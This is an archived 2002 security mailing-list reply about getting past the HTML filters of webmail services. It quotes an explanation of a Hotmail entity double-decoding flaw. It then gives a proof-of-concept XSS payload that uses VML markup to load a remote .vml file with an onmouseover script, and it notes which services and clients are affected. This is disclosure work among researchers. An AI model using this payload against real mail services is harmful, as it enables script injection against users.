Re: double decoding filter bypass (Hotmail) + challenge for you

From: http-equivat_private
Date: Wed Jul 17 2002 - 16:16:35 PDT

Next message: Michel Arboi: "Re: Badware update through P2P?"

Previous message: Fabien SPAGNOLO: "Re: Badware update through P2P?"
Maybe in reply to: FozZy: "double decoding filter bypass (Hotmail) + challenge for you"
Next in thread: FozZy: "Re: double decoding filter bypass (Hotmail) + challenge for you"
Reply: FozZy: "Re: double decoding filter bypass (Hotmail) + challenge for you"
Reply: FozZy: "nsmail XSS hole (was Re: double decoding filter bypass (Hotmail) + challenge for you)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

<!-- So what about Hotmail ? Well, where can we put unicode in an 
html message ? Into an url as %xx, yep, but that's not the point 
here. There is a thing called "html entities" : you can replace *any* 
printable character by its ascii/unicode value in the values of the 
parameters of html tags, for instance in the parameters of the STYLE 
tag (hint !).  "A" is &#x41, "B" is &#x42, etc.
>What the hotmail filter did is replacing any html entity by its 
corresponding character, then trying to filter out any bad string 
(forbidden keywords), THEN giving the output to the user, without re-
applying the filter on this output. But, if there are still html 
entities into this output, the user's browser will interpret them, 
that will possibly give birth to some interesting forbidden 
keywords... and fire a script.-->


Excellent. 

Here's another one for you FozZY:

<HTML xmlns:v = "urn:schemas-microsoft-com:vml">
<STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>

<v:vmlframe 
style="LEFT: 50px; WIDTH: 300px; POSITION: relative; TOP: 30px; 
HEIGHT: 200px" 
src = 
"http://www.malware.com/fooness.vml#malware"></v:vmlframe>

where fooness.vml#malware is:

   <xml xmlns:v = "urn:schemas-microsoft-com:vml">
 <v:rect id="malware"  fillcolor="green" 
   style="position:relative;top:1;left:1;width:20;height:20"
onmouseover="alert('malware was here')">
   </v:rect>
</xml>

1. This works on Yahoo and Excite, probably others
2. Quick fiddling suggests only mouseover works
3. Hotmail only filters this:

<HTML xmlns:v = "urn:schemas-microsoft-com:vml">
<STYLE>v\:* {BEHAVIOR: url(#default#VML)}</STYLE>

which is absolutely required. Probably easier to mask than 
say "Javascript"

note 1/: can't recall, Hotmail may not allow for retrieval of files 
remotely, or base64 encodes them on the Hotmail server if there are 
any. If so, you can embed and CID: the fooness.vml

note /2: the above may also work in IE dependent mail clients 
(Eudora..?..)

note /3: doesn't want to work in Outlook Express with scripting off 
even though the frame aspect works - which is patched in OE6

-- 
http://www.malware.com

Next message: Michel Arboi: "Re: Badware update through P2P?"
Previous message: Fabien SPAGNOLO: "Re: Badware update through P2P?"
Maybe in reply to: FozZy: "double decoding filter bypass (Hotmail) + challenge for you"
Next in thread: FozZy: "Re: double decoding filter bypass (Hotmail) + challenge for you"
Reply: FozZy: "Re: double decoding filter bypass (Hotmail) + challenge for you"
Reply: FozZy: "nsmail XSS hole (was Re: double decoding filter bypass (Hotmail) + challenge for you)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 17 2002 - 18:12:04 PDT